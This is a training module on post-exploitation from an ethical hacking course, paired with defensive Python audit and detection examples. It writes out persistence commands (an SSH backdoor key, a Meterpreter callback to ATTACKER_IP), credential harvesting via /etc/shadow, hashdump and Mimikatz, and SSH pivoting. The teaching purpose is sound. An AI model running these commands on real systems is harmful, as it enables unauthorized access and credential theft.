Stage 09 — Post-Exploitation Concepts

Maintaining Access and Demonstrating Impact

Certified Ethical Hacking I Learning Path
Audience: Learners who have completed Stages 00-08

Prerequisites

  • [ ] Completed exploitation fundamentals (Stage 08)
  • [ ] Understand Metasploit and Meterpreter
  • [ ] Successfully exploited Metasploitable

What You Will Learn

  • Post-exploitation objectives
  • Situational awareness techniques
  • Maintaining access concepts
  • Credential harvesting
  • Lateral movement concepts
  • Pivoting through networks
  • Evidence collection for reporting

Part 1 — Post-Exploitation Objectives (Milestone 1)

What Happens After Initial Access?

┌─────────────────────────────────────────────────────────────────┐
│               Post-Exploitation Objectives                       │
├─────────────────────────────────────────────────────────────────┤
│  1. SITUATIONAL AWARENESS - Who am I? Where am I?              │
│  2. PRIVILEGE ESCALATION - Can I become root/admin?            │
│  3. PERSISTENCE - Can I maintain access?                        │
│  4. CREDENTIAL HARVESTING - What credentials exist?            │
│  5. LATERAL MOVEMENT - Can I reach other systems?              │
│  6. DATA DISCOVERY - What valuable data exists?                │
│  7. IMPACT DEMONSTRATION - What could an attacker do?          │
└─────────────────────────────────────────────────────────────────┘

Part 2 — Situational Awareness (Milestone 2)

Linux Enumeration

whoami && id                    # Current user
hostname && uname -a            # System info
cat /etc/passwd                 # Users
ip addr && netstat -tulpn       # Network
ps aux                          # Processes
find / -perm -4000 2>/dev/null  # SUID binaries

Windows Enumeration

whoami /priv                    # Privileges
systeminfo                      # System info
net user                        # Users
ipconfig /all && netstat -ano   # Network
tasklist                        # Processes

Meterpreter Commands

sysinfo                         # System info
getuid                          # Current user
ipconfig                        # Network
run post/multi/gather/env       # Environment

Part 3 — Maintaining Access (Milestone 3)

Persistence Concepts

| Platform | Methods |
|----------|---------|
| Linux | SSH keys, cron jobs, bashrc, systemd |
| Windows | Registry Run keys, scheduled tasks, services |
| Web | Web shells, modified files |

SSH Key Persistence

# On attacker:
ssh-keygen -t rsa -f backdoor

On target:

mkdir -p ~/.ssh
echo "PUBLIC_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

Meterpreter Persistence

run persistence -U -i 30 -p 4444 -r ATTACKER_IP
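The key appended to authorized_keys above is the artifact this technique leaves behind, and it is what a defender (or the tester verifying cleanup) looks for. The following Python is an added example, not part of this course's material: it audits an authorized_keys file against an inventory of known key fingerprints and flags every key that is not on the list. The sample keys, the allowlist and the file contents are constructed; the fingerprint routine reproduces the `SHA256:` value that `ssh-keygen -lf` prints for a key.

```python
"""Audit an OpenSSH authorized_keys file against an allowlist of known key
fingerprints. Added example; sample keys and inventory are constructed."""
import base64
import hashlib
import struct
from typing import Dict, List

KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH wire-format string (uint32 length + payload)."""
    return struct.pack(">I", len(data)) + data


def make_ed25519_blob(raw_pubkey: bytes) -> str:
    """Base64 key blob in ssh-ed25519 wire format. Constructed test data:
    the 32 bytes passed in are not a real public key."""
    blob = ssh_string(b"ssh-ed25519") + ssh_string(raw_pubkey)
    return base64.b64encode(blob).decode("ascii")


def fingerprint(b64_blob: str) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of sha256(blob),
    the same value `ssh-keygen -lf` prints for the key."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def parse_authorized_keys(text: str) -> List[Dict[str, object]]:
    """Split each entry into options, key type, blob and comment.
    The key type is the first token naming a known algorithm; everything
    before it is the options field (quoted options containing spaces are
    re-joined with single spaces, which is enough for reporting)."""
    entries: List[Dict[str, object]] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            entries.append({"line": lineno, "error": "unparseable entry"})
            continue
        entries.append({
            "line": lineno,
            "options": " ".join(tokens[:idx]),
            "type": tokens[idx],
            "blob": tokens[idx + 1],
            "comment": " ".join(tokens[idx + 2:]),
        })
    return entries


def audit_authorized_keys(text: str, allowlist: Dict[str, str]) -> List[str]:
    """One finding per key whose fingerprint is not in the allowlist
    (fingerprint -> owner) and one per line that cannot be parsed."""
    findings: List[str] = []
    for e in parse_authorized_keys(text):
        if "error" in e:
            findings.append(f"line {e['line']}: {e['error']}")
            continue
        fp = fingerprint(str(e["blob"]))
        if fp not in allowlist:
            findings.append(f"line {e['line']}: unknown {e['type']} key {fp} "
                            f"comment='{e['comment']}' options='{e['options']}'")
    return findings


def mode_is_too_open(mode: int) -> bool:
    """True if group or other have any permission bit set; the chmod 600
    shown above is the expected mode for authorized_keys."""
    return (mode & 0o077) != 0


# Constructed inventory: one key issued through normal provisioning.
KNOWN_KEY = make_ed25519_blob(bytes(range(32)))
ROGUE_KEY = make_ed25519_blob(bytes(range(32, 64)))
ALLOWLIST = {fingerprint(KNOWN_KEY): "alice (laptop, issued by IT)"}

# Constructed authorized_keys content: the second entry was appended
# outside of provisioning, which is what the technique above does.
SAMPLE_AUTHORIZED_KEYS = f"""\
# managed by configuration management
ssh-ed25519 {KNOWN_KEY} alice@laptop
from="10.0.0.5" ssh-ed25519 {ROGUE_KEY} backdoor
"""

if __name__ == "__main__":
    for finding in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST):
        print(finding)
```

Run it as a script to see the single finding for the rogue key. In practice the allowlist comes from your provisioning system's record of issued keys, and `mode_is_too_open` is applied to `os.stat(path).st_mode` for `~/.ssh` and `authorized_keys` on each host.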

Part 4 — Credential Harvesting (Milestone 4)

Linux Credentials

cat /etc/shadow                                    # Password hashes
cat ~/.bash_history                                # Command history
grep -r "password" /etc/ 2>/dev/null              # Config files
grep -r "password" /var/www/ 2>/dev/null          # Web apps
find / -name "id_rsa" 2>/dev/null                 # SSH keys

Windows Credentials

# Meterpreter
hashdump                        # SAM hashes
load kiwi                       # Mimikatz
creds_all                       # All credentials

Common Credential Locations

  • Configuration files
  • Database connection strings
  • Environment variables
  • Browser stored passwords
  • SSH keys
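The grep commands above find credentials by matching on the word "password"; a scanner that knows the common shapes (key/value config entries, connection strings with embedded passwords, private key headers) finds more and produces less noise. The following Python is an added example, not course material: it scans file contents for those shapes, skips variable references and placeholders, and reports each hit with the value redacted, which is the form the evidence section of this stage asks for. The file contents are constructed.

```python
"""Scan configuration text for hard-coded credentials and report them with
values redacted. Added example; the file contents are constructed."""
import re
from typing import Dict, List

# Credential shapes: key/value config entries, URL-style connection strings
# with embedded passwords, and private key headers.
PATTERNS = [
    ("config value", re.compile(
        r"(?i)([\w.-]*(?:password|passwd|pwd|secret|api[_-]?key|token))"
        r"\s*[=:]\s*[\"']?([^\s\"';]+)")),
    ("connection string", re.compile(
        r"(?i)\b[a-z+]+://([^:/\s]+):([^@\s]+)@[^\s\"']+")),
    ("private key", re.compile(
        r"-----BEGIN (?:RSA |OPENSSH |EC )?PRIVATE KEY-----")),
]

# Values that reference a variable or are obvious placeholders are not
# secrets; reporting them would bury the real findings in noise.
PLACEHOLDER_RE = re.compile(r"^\$\{?\w+\}?$|^<[^>]*>$|^(changeme|xxx+|\*+)$", re.I)


def redact(value: str) -> str:
    """Keep only the length, so the report proves a value existed."""
    return f"<redacted, {len(value)} chars>"


def scan_text(path: str, text: str) -> List[str]:
    """Return one finding per credential-looking value in text."""
    findings: List[str] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in PATTERNS:
            for m in pattern.finditer(line):
                # The last capture group holds the secret value; the
                # private key pattern has no groups and is reported as-is.
                value = m.group(m.lastindex) if m.lastindex else ""
                if value and PLACEHOLDER_RE.match(value):
                    continue
                detail = redact(value) if value else "header present"
                findings.append(f"{path}:{lineno}: {kind}, {detail}")
    return findings


def scan_files(files: Dict[str, str]) -> List[str]:
    """Scan a mapping of path -> content (read from disk in real use)."""
    findings: List[str] = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


# Constructed file contents mirroring the locations listed above.
SAMPLE_FILES = {
    "/etc/app/config.ini": (
        "db_host = db.internal\n"
        "db_password = \"hunter2\"\n"
        "password_policy = strict\n"),
    "/var/www/site/.env": (
        "DATABASE_URL=mysql://app:S3cret@db.internal/shop\n"
        "API_KEY=${API_KEY}\n"),
    "/home/deploy/.bash_history": "export TOKEN=abc123\nls -la\n",
    "/home/deploy/.ssh/id_rsa": (
        "-----BEGIN OPENSSH PRIVATE KEY-----\n"
        "constructed placeholder, no real key material\n"),
}

if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(finding)
```

Note what is deliberately not reported: `password_policy = strict` (the key ends in `policy`, not `password`) and `API_KEY=${API_KEY}` (a variable reference). Tuning these exclusions is where most of the value of such a scanner lies; a raw grep returns both.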

Part 5 — Lateral Movement (Milestone 5)

Movement Techniques

┌─────────────────────────────────────────────────────────────────┐
│  CREDENTIAL-BASED: SSH, Pass-the-Hash, RDP                     │
│  EXPLOITATION: Internal vulnerabilities                         │
│  ACCESS-BASED: Shared folders, database links                  │
└─────────────────────────────────────────────────────────────────┘

SSH Movement

ssh user@internal_host
ssh -i found_key user@internal_host
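From the defender's side, the SSH hops above show up in sshd's "Accepted ..." log lines, and the tell-tale pattern is one source address reaching several hosts with credentials that should not be used interactively. The following Python is an added example, not course material: it parses constructed syslog lines from several hosts and applies three rules (login from a non-bastion source, login as a service account, and one source fanning out to many hosts). The policy constants are assumptions for this example.

```python
"""Flag SSH logins that look like lateral movement in sshd 'Accepted ...'
log lines gathered from several hosts. Added example; the log lines and the
policy constants are constructed."""
import re
from collections import defaultdict
from typing import Dict, List, Set

# OpenSSH logs successful authentications as
# "Accepted <method> for <user> from <ip> port <n> ssh2[: <keytype> <fp>]".
LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<src>[\d.]+) port \d+")

# Constructed policy (assumption): interactive SSH should only originate from
# the bastion, service accounts should never log in, and one source reaching
# this many distinct hosts is treated as a fan-out worth investigating.
BASTIONS = {"10.0.0.5"}
SERVICE_ACCOUNTS = {"www-data", "mysql", "postgres"}
FANOUT_THRESHOLD = 3

# Constructed sample lines as a central syslog collector would store them.
SAMPLE_LOG = """\
Mar  3 10:01:12 web01 sshd[2201]: Accepted publickey for deploy from 10.0.0.5 port 51234 ssh2: ED25519 SHA256:constructedfp1
Mar  3 10:02:40 web01 sshd[2210]: Accepted password for deploy from 10.0.0.23 port 40112 ssh2
Mar  3 10:03:05 db01 sshd[1187]: Accepted publickey for www-data from 10.0.0.23 port 40120 ssh2: RSA SHA256:constructedfp2
Mar  3 10:03:51 app01 sshd[3310]: Accepted publickey for deploy from 10.0.0.23 port 40131 ssh2: RSA SHA256:constructedfp2
Mar  3 10:04:20 web01 sshd[2230]: Failed password for root from 10.0.0.23 port 40140 ssh2
"""


def parse_logins(text: str) -> List[Dict[str, str]]:
    """Return one dict per successful login; other lines are ignored."""
    return [m.groupdict() for m in map(LOGIN_RE.match, text.splitlines()) if m]


def detect_lateral_movement(text: str) -> List[str]:
    """Apply the three rules above and return human-readable findings."""
    findings: List[str] = []
    hosts_by_src: Dict[str, Set[str]] = defaultdict(set)
    for ev in parse_logins(text):
        hosts_by_src[ev["src"]].add(ev["host"])
        if ev["src"] not in BASTIONS:
            findings.append(f"{ev['host']}: {ev['method']} login for "
                            f"{ev['user']} from non-bastion {ev['src']}")
        if ev["user"] in SERVICE_ACCOUNTS:
            findings.append(f"{ev['host']}: interactive login as service "
                            f"account {ev['user']} from {ev['src']}")
    # Fan-out: the same source authenticating to many hosts across the
    # collected log is the signature of an operator hopping between systems.
    for src, hosts in hosts_by_src.items():
        if len(hosts) >= FANOUT_THRESHOLD:
            findings.append(f"{src}: reached {len(hosts)} hosts "
                            f"({', '.join(sorted(hosts))}), possible lateral movement")
    return findings


if __name__ == "__main__":
    for finding in detect_lateral_movement(SAMPLE_LOG):
        print(finding)
```

The fan-out rule only works when logs from all hosts land in one place, which is why central log collection matters more for catching lateral movement than any single-host control. The "Failed password" line is ignored by design; failed attempts belong to a separate brute-force rule.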

Part 6 — Pivoting (Milestone 6)

Pivoting Concept

Use a compromised host as a relay to reach networks that are not directly routable from the attacker's machine.

SSH Tunneling

# Local forward
ssh -L 3306:internal:3306 user@pivot

Dynamic SOCKS proxy

ssh -D 9050 user@pivot

Remote forward

ssh -R 8080:localhost:80 user@pivot
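Whether the three forwards above work at all is decided by a handful of sshd_config directives on the pivot host. The following Python is an added example, not course material: it reads an sshd_config, resolves the effective global values the way sshd does (keywords are case-insensitive, the first occurrence of a keyword wins, and directives after the first `Match` line are conditional), and reports the settings that allow each kind of tunnel. A permissive configuration and a hardened one are included; both are constructed.

```python
"""Audit sshd_config for the directives that govern -L, -D and -R tunnels.
Added example; both configurations are constructed."""
from typing import Dict, List

# Compiled-in defaults from sshd_config(5) for the directives audited here.
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permittunnel": "no",
    "permitopen": "any",
}


def effective_settings(text: str) -> Dict[str, str]:
    """Global settings as sshd applies them: the FIRST value for a keyword
    wins, and everything after the first Match block is conditional, so it
    is not folded into the global view."""
    settings = dict(DEFAULTS)
    seen = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.replace("=", " ", 1).split(None, 1)
        keyword = parts[0].lower()
        if keyword == "match":
            break
        if keyword in DEFAULTS and keyword not in seen:
            settings[keyword] = parts[1].strip().lower() if len(parts) > 1 else ""
            seen.add(keyword)
    return settings


def audit_sshd_config(text: str) -> List[str]:
    """Report which tunnel types the global configuration permits."""
    s = effective_settings(text)
    findings: List[str] = []
    fwd = s["allowtcpforwarding"]
    if fwd in ("yes", "all", "local"):
        findings.append(f"AllowTcpForwarding {fwd}: any user can open "
                        "local (-L) and dynamic (-D) forwards through this host")
        if s["permitopen"] == "any":
            findings.append("PermitOpen any: forwarded connections may reach "
                            "any internal host and port")
    if fwd in ("yes", "all", "remote") and s["gatewayports"] in ("yes", "clientspecified"):
        findings.append(f"GatewayPorts {s['gatewayports']}: remote forwards (-R) "
                        "may listen on all interfaces, not only loopback")
    if s["permittunnel"] != "no":
        findings.append(f"PermitTunnel {s['permittunnel']}: layer-2/3 tun "
                        "devices may be created over SSH")
    return findings


# Constructed permissive configuration. The second AllowTcpForwarding line
# is ignored by sshd because the first occurrence wins.
WEAK_CONFIG = """\
Port 22
AllowTcpForwarding yes
GatewayPorts yes
AllowTcpForwarding no   # no effect: sshd keeps the first value
"""

# Constructed hardened configuration: forwarding off globally, re-enabled
# for one group and limited to a single destination.
HARDENED_CONFIG = """\
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
Match Group tunnel-users
    AllowTcpForwarding local
    PermitOpen db.internal:3306
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {name} ==")
        for finding in audit_sshd_config(cfg) or ["no findings"]:
            print("  " + finding)
```

The hardened file shows the practical middle ground: forwarding stays off for everyone, and the one group that legitimately needs a database tunnel gets `AllowTcpForwarding local` with `PermitOpen` pinned to the database, so a compromised account in that group can still not pivot elsewhere.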

Meterpreter Pivoting

route add 10.0.0.0 255.255.255.0 SESSION_ID   # from the msfconsole prompt
run autoroute -s 10.0.0.0/24                  # from inside the Meterpreter session

use auxiliary/server/socks_proxy
set SRVPORT 9050
run
Part 7 — Evidence Collection (Milestone 7)

What to Document

  • Access proof (screenshots, command output)
  • Credentials obtained (redacted)
  • Systems accessed
  • Sensitive data found
  • Potential business impact

Evidence Organization

mkdir -p ~/security-lab/evidence/post_exploit/{screenshots,logs,credentials}

Session logging

script -a session_log.txt

Take screenshots in Meterpreter

screenshot
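Evidence is only useful if you can later show it has not changed since capture. The following Python is an added example, not course material: it hashes every file under an evidence directory into a JSON manifest, and a verification pass reports files that were modified, removed or added afterwards. `run_demo` builds a constructed evidence tree in a temporary directory, seals it, tampers with it and returns what verification found; the directory layout mirrors the one created above.

```python
"""Build a SHA-256 manifest of an evidence directory and verify it later.
Added example; the evidence files created by run_demo are constructed."""
import hashlib
import json
import tempfile
import time
from pathlib import Path
from typing import Any, Dict, List

MANIFEST_NAME = "MANIFEST.sha256.json"


def hash_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_file(path: Path) -> str:
    """Stream the file so large screenshots and logs do not sit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> Dict[str, Any]:
    """Hash every file under root (except the manifest itself) with paths
    relative to root in POSIX form, so the manifest stays portable."""
    files: Dict[str, Dict[str, Any]] = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.name != MANIFEST_NAME:
            files[p.relative_to(root).as_posix()] = {
                "sha256": hash_file(p), "size": p.stat().st_size}
    return {"created_utc": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
            "files": files}


def write_manifest(root: Path, manifest: Dict[str, Any]) -> Path:
    out = root / MANIFEST_NAME
    out.write_text(json.dumps(manifest, indent=2, sort_keys=True))
    return out


def verify_manifest(root: Path, manifest: Dict[str, Any]) -> List[str]:
    """Return discrepancies: modified, missing and unlisted files."""
    problems: List[str] = []
    listed = manifest["files"]
    for rel, meta in listed.items():
        p = root / rel
        if not p.is_file():
            problems.append(f"missing: {rel}")
        elif hash_file(p) != meta["sha256"]:
            problems.append(f"modified: {rel}")
    for p in root.rglob("*"):
        rel = p.relative_to(root).as_posix()
        if p.is_file() and p.name != MANIFEST_NAME and rel not in listed:
            problems.append(f"unlisted: {rel}")
    return problems


def run_demo() -> Dict[str, Any]:
    """Create a constructed evidence tree, seal it, then tamper with it to
    show what verification reports."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for sub in ("screenshots", "logs", "credentials"):
            (root / sub).mkdir()
        (root / "screenshots" / "getuid.png").write_bytes(b"\x89PNG constructed placeholder")
        (root / "logs" / "session_log.txt").write_text("meterpreter > getuid\n")
        (root / "credentials" / "hashes.txt").write_text("redacted\n")
        manifest = build_manifest(root)
        write_manifest(root, manifest)
        clean = verify_manifest(root, manifest)
        # Simulate what verification must catch: an edited log, a deleted
        # screenshot and a file that was not part of the sealed set.
        (root / "logs" / "session_log.txt").write_text("edited after capture\n")
        (root / "screenshots" / "getuid.png").unlink()
        (root / "logs" / "extra.txt").write_text("added later\n")
        return {"files": len(manifest["files"]), "clean": clean,
                "tampered": sorted(verify_manifest(root, manifest))}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Generate the manifest as soon as collection for a milestone is finished and keep a copy outside the evidence directory (or sign it), so that the manifest itself cannot be regenerated to match edited files.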

Part 8 — Cleanup (Milestone 8)

Professional Standards

As a penetration tester:
  • Document all actions
  • Remove only YOUR artifacts
  • Do NOT clear logs
  • Report all access
  • Restore any changes made

Stage 09 Assessment

Written Questions

  1. What are the main post-exploitation objectives?
  2. Explain the difference between persistence and lateral movement.
  3. Where do credentials commonly hide on Linux?
  4. What is pivoting and when is it needed?
  5. What evidence should you collect during post-exploitation?

Practical Assessment

  1. Exploit Metasploitable and perform full enumeration
  2. Search for and document credentials found
  3. Demonstrate potential impact
  4. Create evidence documentation

Completion Checklist

  • [ ] Understand post-exploitation workflow
  • [ ] Can enumerate compromised systems
  • [ ] Understand persistence concepts
  • [ ] Can search for credentials
  • [ ] Understand lateral movement
  • [ ] Understand pivoting concepts
  • [ ] Can collect and organize evidence

Next: Stage 10 — Professional Practice
git add . && git commit -m "Complete Stage 09 - Post-Exploitation Concepts"